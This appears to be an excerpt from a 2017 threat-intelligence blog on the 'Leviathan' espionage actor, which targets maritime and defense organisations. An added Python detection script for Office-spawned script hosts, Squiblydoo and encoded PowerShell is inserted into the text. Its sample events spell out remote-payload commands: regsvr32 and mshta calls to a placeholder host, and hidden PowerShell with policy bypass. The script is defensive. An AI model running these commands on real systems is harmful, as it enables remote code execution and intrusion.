
Leviathan: Espionage actor spearphishes maritime and defense targets

October 16, 2017  Axel F, Pierre T
 
 
Overview
 

Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has a long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

 

Key takeaways from this research include:

 

  • Industry targeting: The actor targets defense contractors, universities (particularly those with military research ties), legal organizations [3] and government agencies [3]. The actor has a particular interest in naval industries, including shipbuilding and related research.
  • Geographical targeting: Targeting includes the United States, Western Europe, and the South China Sea.
  • Tools: Custom JavaScript malware known as “Orz” and “NanHaiShu”, Cobalt Strike, the SeDll JavaScript loader, and the MockDll DLL loader.
  • Delivery: Emailed attachments and URLs, often employing a fraudulent lookalike domain and stolen branding.
  • Exploitation: Microsoft Excel and Word documents with macros (sometimes password-protected), very recent vulnerabilities such as CVE-2017-0199 and CVE-2017-8759, and malicious Microsoft Publisher files.
  • Installation: JavaScript, JavaScript Scriptlets in XML, HTA, PowerShell, WMI, regsvr32, Squiblydoo.
  • Lateral Movement: The actor sometimes utilizes access at one compromised organization to attack the next. For example, compromised email accounts at one organization were used to send the next wave of malicious attachments to potential victims in the same industry. Similarly, the actor attempts to compromise servers within victim organizations and use them for command and control (C&C) for their malware.
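The delivery and installation chain listed above (Office documents spawning script hosts, regsvr32/Squiblydoo scriptlets, HTA, encoded PowerShell) is what endpoint telemetry can catch. The following is an added detection example, not code from Proofpoint or from this report; it runs simple rules over constructed process-creation records of the form `parent|image|command_line` (the record format, rule names and sample values are assumptions).

```python
import re

# Office applications named on this page as the delivery vector (Word, Excel, Publisher).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "mspub.exe"}
# Living-off-the-land hosts listed under "Installation" above.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "regsvr32.exe", "wmic.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events (not from the report): "parent|image|command_line".
SAMPLE_EVENTS = [
    "winword.exe|regsvr32.exe|regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
    "excel.exe|mshta.exe|mshta.exe http://example.invalid/loader.hta",
    "services.exe|regsvr32.exe|regsvr32.exe /s \"C:\\Program Files\\Vendor\\vendor.dll\"",
    "explorer.exe|powershell.exe|powershell.exe -ep bypass -w hidden -enc SQBFAFgA",
    "mspub.exe|wscript.exe|wscript.exe //e:jscript C:\\Users\\u\\AppData\\Local\\Temp\\update.js",
]


def parse_event(line):
    """Parse one constructed 'parent|image|command_line' record into a dict."""
    parent, image, cmd = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.lower(), "cmd": cmd}


def classify(event):
    """Return the detection names that fire for a single process-creation event."""
    hits = []
    image, cmd_l, parent = event["image"], event["cmd"].lower(), event["parent"]
    # Squiblydoo: regsvr32 loading a COM scriptlet, either via /i:<url> or scrobj.dll.
    if image == "regsvr32.exe" and ("scrobj.dll" in cmd_l or re.search(r"/i:\S*https?://", cmd_l)):
        hits.append("squiblydoo_regsvr32_scriptlet")
    # HTA execution from a URL or a local .hta file.
    if image == "mshta.exe" and (URL_RE.search(cmd_l) or ".hta" in cmd_l):
        hits.append("mshta_remote_or_file_hta")
    # Encoded PowerShell command lines (-e / -enc / -encodedcommand).
    if image == "powershell.exe" and re.search(r"(^|\s)-(enc|encodedcommand|e)\s", cmd_l):
        hits.append("powershell_encoded_command")
    # Macro or CVE-2017-0199-style exploitation: an Office process spawning a script host.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    return hits


def scan(lines):
    """Run all rules over raw records; return {record_index: [detections]} for records that fire."""
    findings = {}
    for i, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            findings[i] = hits
    return findings
```

Record 2 (a service registering a vendor DLL) is deliberately benign and should not fire, which is the false-positive case any regsvr32 rule has to handle.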

This blog traces key activities connected to this actor and examines a number of their tools and techniques. Campaigns and details are presented in reverse chronological order to highlight the group’s most recent activities.

 
